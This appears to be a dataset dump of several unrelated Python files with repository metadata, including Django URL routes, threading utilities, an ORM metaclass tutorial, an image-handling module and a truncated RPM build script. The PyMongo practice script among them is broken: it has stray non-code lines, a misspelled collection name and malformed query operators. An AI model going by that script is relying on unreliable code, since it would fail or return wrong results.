| 25.392857 | 74 | 0.573136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 472 | 0.331927 |
2bbdc05950e7d038fdccba28a8a2efe5bcf61d8a | 1,278 | py | Python | sample_dmatrix.py | daimeng/py-geode | a4146804e4def71a6b430e5a16f6e0b1a65deefe | [
"MIT"
] | null | null | null | sample_dmatrix.py | daimeng/py-geode | a4146804e4def71a6b430e5a16f6e0b1a65deefe | [
"MIT"
] | 9 | 2018-11-15T00:44:11.000Z | 2019-03-01T02:52:34.000Z | sample_dmatrix.py | daimeng/py-geode | a4146804e4def71a6b430e5a16f6e0b1a65deefe | [
"MIT"
] | null | null | null | import aiohttp
import pandas as pd
import sys
import asyncio
from geode.dispatcher import AsyncDispatcher
async def main():
client = await AsyncDispatcher.init()
origins_file = sys.argv[1]
destinations_file = sys.argv[2]
origf = pd.read_csv(origins_file)[['lat', 'lon']].round(4).drop_duplicates()
destf = pd.read_csv(destinations_file)[['lat', 'lon']].round(4).drop_duplicates()
appendf = None
append_file = None
if len(sys.argv) >= 4:
append_file = sys.argv[3]
appendf = pd.read_csv(append_file)
appendf = appendf[appendf.source == 'google'].drop_duplicates()
appendf.set_index(pd.MultiIndex.from_arrays([appendf.olat, appendf.olon, appendf.dlat, appendf.dlon]), inplace=True)
origs = origf.values
dests = destf.values
async with aiohttp.ClientSession() as session:
res = await client.distance_matrix(
origins=origs,
destinations=dests,
session=session,
provider='google'
)
df = res.reset_index()
if append_file:
df.to_csv(append_file, mode='a', index=False, header=False, chunksize=1000)
else:
df.to_csv('test.csv', index=False, chunksize=1000)
if __name__ == '__main__':
asyncio.run(main())
| 27.782609 | 124 | 0.654147 | 0 | 0 | 0 | 0 | 0 | 0 | 1,115 | 0.872457 | 59 | 0.046166 |
2bbe4807e1342fac308483071d778e38b6d71f3f | 2,959 | py | Python | yasql/apps/sqlorders/urls.py | Fanduzi/YaSQL | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | [
"Apache-2.0"
] | 443 | 2018-02-08T02:53:48.000Z | 2020-10-13T10:01:55.000Z | yasql/apps/sqlorders/urls.py | Fanduzi/YaSQL | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | [
"Apache-2.0"
] | 27 | 2020-10-14T10:01:52.000Z | 2022-03-12T00:49:47.000Z | yasql/apps/sqlorders/urls.py | Fanduzi/YaSQL | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | [
"Apache-2.0"
] | 148 | 2018-03-15T06:07:25.000Z | 2020-08-17T14:58:45.000Z | # -*- coding:utf-8 -*-
# edit by fuzongfei
from django.urls import path
from sqlorders import views
urlpatterns = [
# SQL工单
path('envs', views.GetDBEnvironment.as_view(), name='v1.sqlorders.db-environment'),
path('schemas', views.GetDbSchemas.as_view(), name='v1.sqlorders.db-schemas'),
path('incep/syntaxcheck', views.IncepSyntaxCheckView.as_view(), name='v1.sqlorders.incep.syntaxcheck'),
path('commit', views.SqlOrdersCommit.as_view(), name='v1.sqlorders.commit'),
path('list', views.SqlOrdersList.as_view(), name='v1.sqlorders.list'),
path('detail/<str:order_id>', views.SqlOrdersDetail.as_view(), name='v1.sqlorders.detail'),
path('op/approve/<int:pk>', views.OpSqlOrderView.as_view({"put": "approve"}), name='v1.sqlorders.approve'),
path('op/feedback/<int:pk>', views.OpSqlOrderView.as_view({"put": "feedback"}), name='v1.sqlorders.feedback'),
path('op/close/<int:pk>', views.OpSqlOrderView.as_view({"put": "close"}), name='v1.sqlorders.close'),
path('op/review/<int:pk>', views.OpSqlOrderView.as_view({"put": "review"}), name='v1.sqlorders.review'),
# 生成工单任务
path('tasks/generate', views.GenerateTasksView.as_view(), name='v1.sqlorders.generate-tasks'),
path('tasks/get/<str:order_id>', views.GetTaskIdView.as_view(), name='v1.sqlorders.get-task-id'),
path('tasks/list/<str:task_id>', views.GetTasksListView.as_view(), name='v1.sqlorders.get-tasks-list'),
path('tasks/preview/<str:task_id>', views.GetTasksPreviewView.as_view(),
name='v1.sqlorders.get-tasks-preview'),
# 执行任务
path('tasks/execute/single', views.ExecuteSingleTaskView.as_view(), name='v1.sqlorders.execute-single-task'),
path('tasks/execute/multi', views.ExecuteMultiTasksView.as_view(), name='v1.sqlorders.execute-multi-tasks'),
path('tasks/throttle', views.ThrottleTaskView.as_view(), name='v1.sqlorders.throttle-task'),
path('tasks/result/<int:id>', views.GetTasksResultView.as_view(), name='v1.sqlorders.get-tasks-result'),
# Hook
path('hook', views.HookSqlOrdersView.as_view(), name='v1.sqlorders.hook-sqlorders'),
# download export files
path('export/download/<str:base64_filename>', views.DownloadExportFilesView.as_view(),
name='v1.sqlorders.download-export-files'),
# 上线版本
path('versions/get', views.ReleaseVersionsGet.as_view(), name='v1.sqlorders.versions.get'),
path('versions/list', views.ReleaseVersionsList.as_view(), name='v1.sqlorders.versions.list'),
path('versions/create', views.ReleaseVersionsCreate.as_view(),
name='v1.sqlorders.versions.create'),
path('versions/update/<int:key>', views.ReleaseVersionsUpdate.as_view(),
name='v1.sqlorders.versions.update'),
path('versions/delete/<int:id>', views.ReleaseVersionsDelete.as_view(),
name='v1.sqlorders.versions.delete'),
path('versions/view/<str:version>', views.ReleaseVersionsView.as_view(),
name='v1.sqlorders.versions.view'),
]
| 61.645833 | 114 | 0.707672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,402 | 0.46874 |
2bbef937c77131c86b085238ab54baf19c2dd111 | 3,119 | py | Python | pandacommon/pandautils/thread_utils.py | PanDAWMS/panda-common | 0617167abb2c84e964434a73e1f3bcebc9bbb526 | [
"Apache-2.0"
] | 1 | 2020-04-17T10:25:08.000Z | 2020-04-17T10:25:08.000Z | pandacommon/pandautils/thread_utils.py | PanDAWMS/panda-common | 0617167abb2c84e964434a73e1f3bcebc9bbb526 | [
"Apache-2.0"
] | 4 | 2015-09-28T11:11:39.000Z | 2020-10-16T11:21:31.000Z | pandacommon/pandautils/thread_utils.py | PanDAWMS/panda-common | 0617167abb2c84e964434a73e1f3bcebc9bbb526 | [
"Apache-2.0"
] | 3 | 2015-04-06T13:23:43.000Z | 2018-01-19T09:11:35.000Z | import os
import threading
import socket
import datetime
import random
import multiprocessing
class GenericThread(threading.Thread):
def __init__(self, **kwargs):
threading.Thread.__init__(self, **kwargs)
self.hostname = socket.gethostname()
self.os_pid = os.getpid()
def get_pid(self):
"""
get host/process/thread identifier
"""
thread_id = self.ident if self.ident else 0
return '{0}_{1}-{2}'.format(self.hostname, self.os_pid, format(thread_id, 'x'))
# map with lock
class MapWithLockAndTimeout(dict):
def __init__(self, *args, **kwargs):
# set timeout
if 'timeout' in kwargs:
self.timeout = kwargs['timeout']
del kwargs['timeout']
else:
self.timeout = 10
self.lock = threading.Lock()
dict.__init__(self, *args, **kwargs)
# get item regardless of freshness to avoid race-condition in check->get
def __getitem__(self, item):
with self.lock:
ret = dict.__getitem__(self, item)
return ret['data']
def __setitem__(self, item, value):
with self.lock:
dict.__setitem__(self, item, {'time_stamp': datetime.datetime.utcnow(),
'data': value})
# check data by taking freshness into account
def __contains__(self, item):
with self.lock:
try:
ret = dict.__getitem__(self, item)
if ret['time_stamp'] > datetime.datetime.utcnow() - datetime.timedelta(minutes=self.timeout):
return True
except Exception:
pass
return False
# weighted lists
class WeightedLists(object):
def __init__(self, lock):
self.lock = multiprocessing.Lock()
self.data = multiprocessing.Queue()
self.data.put(dict())
self.weights = multiprocessing.Queue()
self.weights.put(dict())
def __len__(self):
with self.lock:
l = 0
data = self.data.get()
for item in data:
l += len(data[item])
self.data.put(data)
return l
def add(self, weight, list_data):
if not list_data or weight <= 0:
return
with self.lock:
data = self.data.get()
weights = self.weights.get()
item = len(weights)
weights[item] = weight
data[item] = list_data
self.weights.put(weights)
self.data.put(data)
def pop(self):
with self.lock:
weights = self.weights.get()
if not weights:
self.weights.put(weights)
return None
item = random.choices(list(weights.keys()), weights=list(weights.values()))[0]
data = self.data.get()
d = data[item].pop()
# delete empty
if not data[item]:
del data[item]
del weights[item]
self.weights.put(weights)
self.data.put(data)
return d
| 29.149533 | 109 | 0.54665 | 2,983 | 0.956396 | 0 | 0 | 0 | 0 | 0 | 0 | 312 | 0.100032 |
2bc00265a709828bcb44535b1333cf0cc4954225 | 4,456 | py | Python | 09WebFramework/day04/basic04.py | HaoZhang95/PythonAndMachineLearning | b897224b8a0e6a5734f408df8c24846a98c553bf | [
"MIT"
] | 937 | 2019-05-08T08:46:25.000Z | 2022-03-31T12:56:07.000Z | 09WebFramework/day04/basic04.py | Sakura-gh/Python24 | b97e18867264a0647d5645c7d757a0040e755577 | [
"MIT"
] | 47 | 2019-09-17T10:06:02.000Z | 2022-03-11T23:46:52.000Z | 09WebFramework/day04/basic04.py | Sakura-gh/Python24 | b97e18867264a0647d5645c7d757a0040e755577 | [
"MIT"
] | 354 | 2019-05-10T02:15:26.000Z | 2022-03-30T05:52:57.000Z | """
ORM是django的核心思想, object-related-mapping对象-关系-映射
ORM核心就是操作数据库的时候不再直接操作sql语句,而是操作对象
定义一个类,类中有uid,username等类属型,sql语句insert修改的时候直接插入这个User对象
"""
# ORM映射实现原理,通过type修改类对象信息
# 定义这个元类metaclass
class ModelMetaclass(type):
def __new__(cls, name, bases, attrs):
# name --> User
# bases --> object
# attrs --> {
# "uid" :('uid', "int unsigned"),
# "name": ('username', "varchar(30)"),
# "email": ('email', "varchar(30)"),
# "password": ('password', "varchar(30)"),
# "__init__": xxx,
# "save": xxx2,
# }
mappings = dict()
# 判断是否需要保存
for k, v in attrs.items():
# 判断是否是元组类型
if isinstance(v, tuple):
print('Found mapping: %s ==> %s' % (k, v))
mappings[k] = v
# 删除这些已经在字典中存储的属性
for k in mappings.keys():
attrs.pop(k) # 等于del attrs[k]
# 将之前的uid/name/email/password以及对应的对象引用、类名字
# attrs = {
# "__init__": xxxx,
# "save": xxxx2,
# "__mappings__": {
# "uid": ('uid', "int unsigned"),
# "name": ('username', "varchar(30)"),
# ""email: ('email', "varchar(30)"),
# "password": ('password', "varchar(30)")
# },
# "__table__": "User"
# }
attrs['__mappings__'] = mappings # 保存属性和列的映射关系
attrs['__table__'] = name # 假设表名和类名一致
return type.__new__(cls, name, bases, attrs)
class User(metaclass=ModelMetaclass):
uid = ('uid', "int unsigned")
name = ('username', "varchar(30)")
email = ('email', "varchar(30)")
password = ('password', "varchar(30)")
# 当指定元类之后,以上的类属性将不在类中,而是在__mappings__属性指定的字典中存储
# 以上User类中有
# __mappings__ = {
# "uid": ('uid', "int unsigned")
# "name": ('username', "varchar(30)")
# "email": ('email', "varchar(30)")
# "password": ('password', "varchar(30)")
# }
# __table__ = "User"
# 参数名是kwargs,不是**kwargs,**只是告诉解释器将传来的参数变为字典
# for循环遍历__new__返回的attrs字典,实现实例对象的属性和方法赋值
def __init__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
def save(self):
fields = [] # ["uid", "username"...]
args = [] #[12345, "laowang"...]
# 创建的实例对象中没有__mapping__,去类对象中找
# k --> uid, v --> 12345
for k, v in self.__mappings__.items():
fields.append(v[0])
args.append(getattr(self, k, None))
args_temp = list()
for temp in args:
if isinstance(temp, int):
# 判断如果是数字类型
args_temp.append(str(temp))
elif isinstance(temp, str):
# 判断如果是字符串类型
args_temp.append("""'%s'""" % temp)
# sql = 'insert into %s (%s) values (%s);' \
# % (self.__table__, ','.join(fields), ','.join([str(i) for i in args]))
# 使用",".join为每一个字段后都插入逗号分隔
sql = 'insert into %s (%s) values (%s)' % (self.__table__, ','.join(fields), ','.join(args_temp))
print('SQL: %s' % sql)
# 抽取为基类,再创建User2这个类,就直接让其继承Model类
class Model(object, metaclass=ModelMetaclass):
def __init__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
def save(self):
fields = []
args = []
for k, v in self.__mappings__.items():
fields.append(v[0])
args.append(getattr(self, k, None))
args_temp = list()
for temp in args:
# 判断入如果是数字类型
if isinstance(temp, int):
args_temp.append(str(temp))
elif isinstance(temp, str):
args_temp.append("""'%s'""" % temp)
sql = 'insert into %s (%s) values (%s)' % (self.__table__, ','.join(fields), ','.join(args_temp))
print('SQL: %s' % sql)
class User2(Model):
uid = ('uid', "int unsigned")
name = ('username', "varchar(30)")
email = ('email', "varchar(30)")
password = ('password', "varchar(30)")
def test01():
u = User(uid=12345, name='Michael', email='test@orm.org', password='my-pwd')
# print(u.__dict__)
u.save()
def test02():
list = ['12356', "laowang", "email"]
print(",".join(list))
def main():
# test01()
test02()
if __name__ == '__main__':
main()
| 28.748387 | 105 | 0.507855 | 4,347 | 0.849355 | 0 | 0 | 0 | 0 | 0 | 0 | 2,605 | 0.508988 |
2bc366f88045d8e0fb26fb566dafc8ab43dfdefc | 146 | py | Python | eventi/core/admin.py | klebercode/lionsclub | 60db85d44214561d20f85673e8f6c047fab07ee9 | [
"MIT"
] | 1 | 2022-02-28T00:07:14.000Z | 2022-02-28T00:07:14.000Z | eventi/core/admin.py | klebercode/lionsclub | 60db85d44214561d20f85673e8f6c047fab07ee9 | [
"MIT"
] | null | null | null | eventi/core/admin.py | klebercode/lionsclub | 60db85d44214561d20f85673e8f6c047fab07ee9 | [
"MIT"
] | null | null | null | # coding: utf-8
from django.contrib import admin
from eventi.core.models import Club, Info
admin.site.register(Club)
admin.site.register(Info)
| 16.222222 | 41 | 0.780822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.10274 |
2bc59939181c875a61b3f943ea4d563e7976ef42 | 1,075 | py | Python | LAB/05/0530_PyMongo.py | LegenDad/KTM_Lab | 09a1671b1dfe9b667008279ef41a959f08babbfc | [
"MIT"
] | null | null | null | LAB/05/0530_PyMongo.py | LegenDad/KTM_Lab | 09a1671b1dfe9b667008279ef41a959f08babbfc | [
"MIT"
] | null | null | null | LAB/05/0530_PyMongo.py | LegenDad/KTM_Lab | 09a1671b1dfe9b667008279ef41a959f08babbfc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu May 31 09:09:26 2018
@author: Jeon
"""
!pip search pymongo
!pip install pymongo
import pymongo
mgclient = pymongo.MongoClient("localhost", 27017)
# check start mogodb (mongod)
mgclient.database_names()
testdb = mgclient.testdb
testdb_col = testdb.items
data= { "name":"cola", "pty":5, "price":500}
testdb_col.insert(data)
testdb.supermarket.insert(data)
print(mgclient.database_names())
for doc in testdb.supermarket.find():
print(doc)
games
heros Tracer
userNum
tracer = {"games":"Overwatch", "hero":"Tracer", "userNum":8888}
testdb.games.insert(tracer)
for doc in testdb.games.find():
print(doc)
for post in testdb.supermarket.find():
print(post)
print(testdb.supermakret.find({"price":500}).count())
print(testdb.supermarket.find({"name":'GS'}).count())
print(testdb.supermarket.find({"pty":1}).count())
print(testdb.supermarket.find({"pty": {"gt":3} }).count())
print(testdb.supermakret.find({"price": {"gt":3} }).count())
for post in testdb.supermakret.find().sort('name'):
print(post) | 19.545455 | 63 | 0.692093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 234 | 0.217674 |
2bc5fd37e006f771bdbfbce48ca1e4e8865d7cc3 | 10,285 | py | Python | src/animasnd/image.py | N-z0/commonz | 275c48ef6aac32f0d809a96e56b0b0c254686747 | [
"Unlicense"
] | null | null | null | src/animasnd/image.py | N-z0/commonz | 275c48ef6aac32f0d809a96e56b0b0c254686747 | [
"Unlicense"
] | null | null | null | src/animasnd/image.py | N-z0/commonz | 275c48ef6aac32f0d809a96e56b0b0c254686747 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
#coding: utf-8
### 1st line allows to execute this script by typing only its name in terminal, with no need to precede it with the python command
### 2nd line declaring source code charset should be not necessary but for exemple pydoc request it
__doc__ = "provide images support"#information describing the purpose of this module
__status__ = "Development"#should be one of 'Prototype' 'Development' 'Production' 'Deprecated' 'Release'
__version__ = "3.0.0"# version number,date or about last modification made compared to the previous version
__license__ = "public domain"# ref to an official existing License
__date__ = "2008"#started creation date / year month day
__author__ = "N-zo syslog@laposte.net"#the creator origin of this prog,
__maintainer__ = "Nzo"#person who curently makes improvements, replacing the author
__credits__ = []#passed mainteners and any other helpers
__contact__ = "syslog@laposte.net"# current contact adress for more info about this file
### images modules
#import pygame # designed for writing games. (is not specific to images)
#import scipy # deprecating image I/O functionality and will be removed
### Pillow was the main library used by Scipy for images.
#import imageio # variety of plugins for many images formats.
### Pillow is also the main plugin of imageio for common images
### PIL (Python Image Library) been late adapted on Python3
### then a fork for Python 3 named Pillow been made
### so Pillow and PIL are almost the same
from PIL import Image
from PIL import ImageChops
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from PIL import ImageFilter
### OpenCV (OpenSource Computer Vision) is available in Debian repo
### But no official OpenCV packages released by OpenCV.org on PyPI
### But on PyPI the not official opencv-contrib-python includes all OpenCV functionality.
import cv2
#import cairo # 2D graphics library
### others required modules
import numpy # use for exporting image as array
### PIL Image modes:
BITMAP_MODE = '1' #1b this binary mode is not respected, pixels values are stored with 0 or 255.
GREY_MODE = 'L' #1o shade of grey varies from 0 to 256
LA_MODE = 'LA' # same as L mode with alpha
INDEX_MODE = 'P' #1o the number of colors in a palette may vary, it is not always 256 colors,
RGB_MODE = 'RGB' #3o true color
HSV_MODE = 'HSV' #3o Hue, Saturation, Value
RGBA_MODE = 'RGBA' #4o true color with transparency
INT_MODE = 'I' #4o(signed integer) why signed ?? anyway, I did not find any image format with this mode
FLOAT_MODE = 'F' #4o(floating point) I did not find any image format with this mode.
### resize resample:
### If omitted, or if the image has mode “1” or “P”, it is set PIL.Image.NEAREST.
NEAREST=Image.NEAREST# (use nearest pixels neighbour)
BILINEAR=Image.BILINEAR# (linear pixels interpolation)
BICUBIC=Image.BICUBIC# (cubic spline pixels interpolation) **the most interesting***
LANCZOS=Image.LANCZOS# (a high-quality downsampling pixels filter)
### transpose methods:
FLIP_HORIZONTALLY=Image.FLIP_LEFT_RIGHT
FLIP_VERTICALLY=Image.FLIP_TOP_BOTTOM
ROTATE_90=Image.ROTATE_90
ROTATE_180=Image.ROTATE_180
ROTATE_270=Image.ROTATE_270
TRANSPOSE=Image.TRANSPOSE
### text alignement
ALIGN_LEFT="left"
ALIGN_CENTER="center"
ALIGN_RIGHT="right"
### Direction of the text.
### not supported without libraqm
DIR_RTL="rtl" # (right to left)
DIR_LTR="ltr" # (left to right)
DIR_TTB="ttb" # (top to bottom). Requires libraqm.
### pixel location Indexes
X=0
Y=1
### pixel compo Indexes
R=0
G=1
B=2
A=3
### RGB basics colors
RED=(255,0,0)
GREEN=(0,255,0)
BLUE=(0,0,255)
BLACK=(0,0,0)
WHITE=(255,255,255)
### disable DecompressionBomb safety
#Image.MAX_IMAGE_PIXELS = 200000**2
#Image.warnings.simplefilter('ignore', Image.DecompressionBombWarning)
def image_show(imagefile,title=None):
"""Load and image file and show it in window"""
img = cv2.imread(imagefile,cv2.IMREAD_UNCHANGED)
cv2.imshow(title,img)
cv2.waitKey(0)#display the window infinitely until any keypress.
cv2.destroyAllWindows()
class Bitmap :
"""allow bitmap image manipulation"""
def __init__(self, mode, size, color):
"""mode is the format of pixels, size contains x and y image dimension, color concern the image background"""
self.img= Image.new( mode, size, color )
#self.filename= self.img.filename
#self.size= self.img.size
#self.fmt = self.img.format
#self.mode = self.img.mode
#self.info = self.img.info
def get_info(self):
"""get extra info about the image"""
return self.img.info
def get_size(self):
"""get the x,y size of the image"""
return self.img.size
def get_mode(self):
"""get image pixel format info"""
return self.img.mode
def get_colors(self):
"""return the quantity of pixels for each colors"""
return self.img.getcolors()
def show(self,title=None):
"""display the image in new window"""
self.img.show(title)
def get_pixel(self,position):
"""get the valu of image pixel"""
return self.img.getpixel(position)
def set_pixel(self,position,valu):
"""change the valu of image pixel"""
self.img.putpixel(position,valu)
def set_alpha(self,alpha):
"""change the transparency of the image"""
self.img.putalpha(alpha)
def resize(self,new_size,resample=NEAREST):
"""resize the image by x,y new size"""
self.img = self.img.resize(new_size,resample)
def transpose(self,direction):
"""rotate flip the image
FLIP_VERTICALLY adapt image for openGL
ROTATE_270 FLIP_VERTICALLY adapt image for numpy array"""
self.img = self.img.transpose(direction)
def offset(self,offset):
"""displace the image by x,y pixel move"""
self.img= ImageChops.offset(self.img,offset[X],offset[Y])
def crop(self,cut):
"""cut the image by left,top,right,bottom"""
self.img= self.img.crop(cut)
def convert(self,mode):
"""convert image into the given mode"""
# ImageOps.grayscale(self.img) = self.img.convert('L')
# image.convert(mode='F') # transforms the image values into float, but without putting them between 0.0 and 1.0
self.img= self.img.convert(mode)
def save(self,output_path):
"""save image in default format"""
self.save_png(output_path)
def save_gif(self,output_path):
"""save image in .gif format"""
self.img.save(output_path)
def save_bmp(self,output_path):
"""save image in .bmp format"""
self.img.save(output_path,compression='bmp_rle')
def save_tga(self,output_path):
"""save image in .tga format"""
self.img.save(output_path)
def save_tiff(self,output_path):
"""save image in .tif format"""
self.img.save(output_path,compression="tiff_deflate")
def save_png(self,output_path):
"""save image in .png format"""
self.img.save(output_path,"PNG",optimize=True)
def tile(self,scale):#scale mini is (1,1)
"""repeat the image horizontally and vertically"""
new_size=( self.img.size[X]*int(scale[X]) , self.img.size[Y]*int(scale[Y]) )
result = Image.new(self.img.mode,new_size)# create a new image
#print(self.img.size,scale)
for left in range(0,new_size[X],self.img.size[X]):
for top in range(0,new_size[Y],self.img.size[Y]):
#print(left, top)
result.paste(self.img, (left,top))
self.img= result
def get_gl_data(self):
"""return image data as opengl image"""
data = self.img.tobytes("raw",self.img.mode)# tostring() has been removed. Please call tobytes() instead.
#data = self.img.getData()
return data
def get_array(self,tip):
"""return image data as numpy array"""
return numpy.asarray(self.img,dtype=numpy.dtype(tip))
def mask(self,mask_img):
"""the grey scale mask_img picels are use for set the image transparency"""
self.img.putalpha(mask_img.img)
def blend(self,other_img,mix_factor=0.5):
"""no change if mix_factor=0, if mix_factor=1 the image is completly remplaced by the other_img"""
self.img= Image.blend(self.img,other_img.img,mix_factor)
def compose(self,other_img,alpha_img):
"""same as blend but instead using mix_factor use alpha pixels valu of alpha_img"""
self.img= Image.composite(self.img,other_img.img,alpha_img.img)
def overwrite(self,other_img):
"""write the other image on top of self image"""
self.img= Image.alpha_composite(self.img,other_img.img)
def smooth(self,qantum):
"""makes image edges and points less sharp"""
for q in range(qantum) :
self.img= self.img.filter(ImageFilter.SMOOTH_MORE)
#self.img= self.img.filter(ImageFilter.BLUR)
class Bitmap_File(Bitmap) :
"""allow bitmap image file manipulation"""
def __init__(self,image_file):
"""need to provide an image file pathname"""
img = Image.open(image_file)
### Verifies the contents of a file. without decoding the image data. If any problems raises exceptions.
img.verify()
### after using image.verify(), need to reopen the image file.
self.img = Image.open(image_file)
class Bitmap_Text(Bitmap) :
"""allow to write text in bitmap"""
def __init__(self,font_name,font_size,background_color,text_color,contour_color,contour_size):
"""need to provide an text data"""
self.font = ImageFont.truetype(font=font_name,size=font_size)
self.background_color=background_color
self.text_color=text_color
self.contour_color=contour_color
self.contour_size=contour_size
self.img = Image.new ( RGBA_MODE,(1,1),background_color )
def write(self,text,dir,align,spacing):
"""create the appropriate image to write in a text with the font specified previously"""
total_size=[0,0]
quantum=0
for line in text.splitlines():
line_size= self.font.getsize(line)
total_size[X]=max(total_size[X],line_size[X])
total_size[Y]+=line_size[Y]
quantum+=1
#print(line_size,total_size)
total_size[X]+=self.contour_size*2
total_size[Y]+=self.contour_size*2 + (quantum-1)*spacing
#other_total_size=ImageDraw.textsize(text,font=self.font,spacing=spacing,direction=dir,stroke_width=self.contour_size)
#print(other_total_size,total_size)
self.img = Image.new( RGBA_MODE,total_size,self.background_color )
draw = ImageDraw.Draw( self.img )
draw.text((self.contour_size,self.contour_size),text,font=self.font,fill=self.text_color,spacing=spacing,direction=dir,align=align)#,stroke_width=self.contour_size,stroke_fill=self.contour_color )
| 31.940994 | 198 | 0.734565 | 6,206 | 0.602934 | 0 | 0 | 0 | 0 | 0 | 0 | 5,575 | 0.54163 |
2bca9532a8c9a9fdc0dfa94bcf1da0e809d38422 | 42,627 | py | Python | scripts/buildrpm.py | fstab50/branchdiff | b438a70403d91bda1f14df884134c7cb1d980837 | [
"MIT"
] | 2 | 2019-03-05T04:37:49.000Z | 2021-04-08T04:03:31.000Z | scripts/buildrpm.py | fstab50/branchdiff | b438a70403d91bda1f14df884134c7cb1d980837 | [
"MIT"
] | 4 | 2018-11-22T17:57:42.000Z | 2019-09-23T22:20:21.000Z | scripts/buildrpm.py | fstab50/branchdiff | b438a70403d91bda1f14df884134c7cb1d980837 | [
"MIT"
] | 1 | 2021-09-13T02:03:42.000Z | 2021-09-13T02:03:42.000Z | #!/usr/bin/env python3
"""
Summary:
buildrpm (python3): branchdiff binary operating system package (.rpm, Redhat, Redhat-based systems)
- Automatic determination of version to be built
- Build version can optionally be forced to a specific version
- Resulting rpm ackage produced in packaging/rpm directory
- To execute build, from the directory of this module, run:
.. code-block:: python
$ cd ../<project dir>
$ make buildrpm
Author:
Blake Huber
Copyright 2017-2018, All Rights Reserved.
License:
General Public License v3
Additional terms may be found in the complete license agreement:
https://bitbucket.org/blakeca00/branchdiffthon3/src/master/LICENSE.md
OS Support:
- Redhat, CentOS, Fedora, Redhat-based variants
Dependencies:
- Requires python3, developed and tested under python3.6
"""
import argparse
import inspect
import json
import os
import sys
import subprocess
import tarfile
import fileinput
from shutil import copy2 as copyfile
from shutil import copytree, rmtree, which
import distro
import docker
import loggers
from pyaws.utils import stdout_message, export_json_object
from pyaws.colors import Colors
from common import debug_header
try:
from pyaws.core.oscodes_unix import exit_codes
except Exception:
from pyaws.core.oscodes_win import exit_codes # non-specific os-safe codes
# globals
PROJECT = 'branchdiff'
module = os.path.basename(__file__)
TMPDIR = '/tmp/build'
VOLMNT = '/tmp/rpm'
CONTAINER_VOLMNT = '/mnt/rpm'
DISTRO_LIST = ['centos7', 'amazonlinux', 'redhat7']
# docker
dclient = docker.from_env()
# formatting
act = Colors.ORANGE # accent highlight (bright orange)
bd = Colors.BOLD + Colors.WHITE # title formatting
bn = Colors.CYAN # color for main binary highlighting
lk = Colors.DARK_BLUE # color for filesystem path confirmations
red = Colors.RED # color for failed operations
yl = Colors.GOLD3 # color when copying, creating paths
rst = Colors.RESET # reset all color, formatting
arrow = yl + Colors.BOLD + '-->' + rst
# global logger
logger = loggers.getLogger('1.0')
def git_root():
"""
Summary.
Returns root directory of git repository
"""
cmd = 'git rev-parse --show-toplevel 2>/dev/null'
return subprocess.getoutput(cmd).strip()
def help_menu():
"""
Summary.
Command line parameter options (Help Menu)
"""
menu = '''
''' + bd + module + rst + ''' help contents
''' + bd + '''DESCRIPTION''' + rst + '''
Builds an installable package (.rpm) for Redhat, CentOS, and Fedora
variants of the Linux Operatining System
''' + bd + '''OPTIONS''' + rst + '''
$ python3 ''' + act + module + rst + ''' --build [ --force-version <VERSION> ]
-b, --build
-d, --distro <value>
[-D, --debug ]
[-f, --force ]
[-h, --help ]
[-p, --parameter-file <value> ]
[-s, --set-version <value> ]
''' + bd + '''-b''' + rst + ''', ''' + bd + '''--build''' + rst + ''': Build Operating System package ( *.rpm, Redhat systems )
When given without the --set-version parameter switch, build ver-
sion is extracted from the project repository information
''' + bd + '''-d''' + rst + ''', ''' + bd + '''--debug''' + rst + ''': Debug mode, verbose output.
''' + bd + '''-d''' + rst + ''', ''' + bd + '''--distro''' + rst + ''' <value>: Specifies the Docker Operating System Image to
use when building. Allowable Values:
- centos7 (DEFAULT)
- amazonlinux
- redhat7
''' + bd + '''-F''' + rst + ''', ''' + bd + '''--force''' + rst + ''': When given, overwrites any pre-existing build artifacts.
DEFAULT: False
''' + bd + '''-h''' + rst + ''', ''' + bd + '''--help''' + rst + ''': Print this help menu
''' + bd + '''-p''' + rst + ''', ''' + bd + '''--parameter-file''' + rst + ''' <value>: Optional json format configuration file
containing all configuration parameters to build rpm package (key,
value format)
''' + bd + '''-s''' + rst + ''', ''' + bd + '''--set-version''' + rst + ''' (string): When given, overrides all version infor-
mation contained in the project to build the exact version speci-
fied by VERSION parameter
'''
print(menu)
return True
def clean(directory, debug):
"""
Summary.
rm residual installation files from build directory
"""
bytecode_list = list(
filter(
lambda x: x.endswith('.pyc') or x.endswith('.pyo'), os.listdir(directory)
)
)
if debug:
stdout_message(
message=f'bytecode_list contents: {bytecode_list}',
prefix='DEBUG'
)
for artifact in bytecode_list:
os.remove(directory + '/' + artifact)
logger.info('Artifact {} cleaned from {}'.format(artifact, directory))
return True
def current_branch(path):
"""
Returns:
git repository source url, TYPE: str
"""
cmd = 'git branch'
pwd = os.getcwd()
os.chdir(path)
try:
if '.git' in os.listdir('.'):
branch = subprocess.getoutput('git branch').split('*')[1].split('\n')[0][1:]
else:
ex = Exception(
'%s: Unable to identify current branch - path not a git repository: %s' %
(inspect.stack()[0][3], path))
raise ex
os.chdir(pwd) # return cursor
except IndexError:
logger.exception(
'%s: problem retrieving git branch for %s' %
(inspect.stack()[0][3], path)
)
return ''
return branch
def read(fname):
basedir = os.path.dirname(sys.argv[0])
return open(os.path.join(basedir, fname)).read()
def masterbranch_version(version_module):
"""
Returns version denoted in the master branch of the repository
"""
branch = current_branch(git_root())
commands = ['git checkout master', 'git checkout {}'.format(branch)]
try:
# checkout master
#stdout_message('Checkout master branch:\n\n%s' % subprocess.getoutput(commands[0]))
masterversion = read(version_module).split('=')[1].strip().strip('"')
# return to working branch
stdout_message(
'Returning to working branch: checkout %s\n\n%s'.format(branch)
)
stdout_message(subprocess.getoutput(f'git checkout {branch}'))
except Exception:
return None
return masterversion
def current_version(binary, version_modpath):
"""
Summary:
Returns current binary package version if locally
installed, master branch __version__ if the binary
being built is not installed locally
Args:
:root (str): path to the project root directory
:binary (str): Name of main project exectuable
Returns:
